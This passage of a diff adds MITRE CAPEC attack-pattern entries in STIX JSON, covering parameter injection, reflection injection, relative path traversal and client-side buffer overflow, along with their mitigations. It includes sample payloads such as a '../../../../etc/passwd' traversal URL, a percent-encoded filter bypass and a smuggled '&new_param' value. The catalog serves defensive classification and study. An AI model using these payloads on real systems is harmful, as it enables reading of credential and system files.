"2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "spec_version": "2.1", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.", + "id": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--674db528-648e-458e-81fc-e9ef0a61222e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "spec_version": "2.1", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.", + "external_references": [ + { + "external_id": "CAPEC-137", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/137.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + } + ], + "id": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Parameter Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Modify Data (Successful parameter injection attacks mean a compromise to integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca", + "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7" + ], + "x_capec_prerequisites": [ + "The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to provide string input to the target." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87d764be-a2f1-4a91-b9fb-61093b531c50", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "spec_version": "2.1", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Treat all user input as untrusted data that must be validated before use.", + "id": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f667d453-e763-41ac-ad05-bcda477818fd", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "spec_version": "2.1", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.", + "external_references": [ + { + "external_id": "CAPEC-138", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-470", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/470.html" + } + ], + "id": "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Reflection Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.", + "external_references": [ + { + "external_id": "CAPEC-139", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/139.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Relative Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

    3. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser plug-ins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying relative file path combinations on all found user input locations and observes the responses.

    2. Techniques
    Provide \"../\" or \"..\\\" at the beginning of any filename to traverse to the parent directory
    Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as \"../\".
    Use a proxy tool to record results of manual input of relative path traversal probes in known URLs.

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

    2. Techniques
    Manipulate file and its path by injecting relative path sequences (e.g. \"../\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbcc574c-56af-4a8a-b9c0-d5b4d59b58ed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6783fbbe-cb1a-4317-b126-e62c3d58ea7a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prefer working without user input when using file system calls", + "id": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa273050-3e5a-48ed-99c7-1995e7e3dddf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7fa50c0f-70d2-46b9-9b96-8a6d35003ae2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42bb8848-1460-40e7-8946-994f5692eb0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. For example, if the client-side application is a browser, the service will host a webpage that the browser loads.", + "external_references": [ + { + "external_id": "CAPEC-14", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/14.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Client-side Injection-induced Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Authors often use tags in HTML documents. For example\n \n In Internet Explorer 4.0 an adversary attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target client-side application: The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.
    Examine APIs of the client-side application and look for areas where a buffer overflow might be possible.

  2. Create hostile service: The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.

    2. Techniques
    If the adversary is targeting a local client-side application, they just need to use the service themselves.
    If the adversary is attempting to cause an overflow on an external user's client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user's browser.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted client software communicates with an external server.", + "The targeted client software has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.", + "Low": "To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should not install untrusted code from a non-authenticated server.", + "id": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a74ceb6-2d35-4bcc-9ead-f651fb717fec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.", + "id": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ffe9eb1-760d-4e9e-9075-29f67befc8f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for length of buffer inputs.", + "id": "course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93d45ad5-fae3-4178-8d28-ccd3ff20216c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1bb78a3-4a93-4fbe-815f-5cca85a0c491", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "id": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f20aff5-3638-4761-91c5-af43ae273927", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all buffer uses are consistently bounds-checked.", + "id": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4914cfc7-c995-469b-984b-72e07bf331e0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acdc688e-fa9d-48da-94ba-90902d7ac10d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + 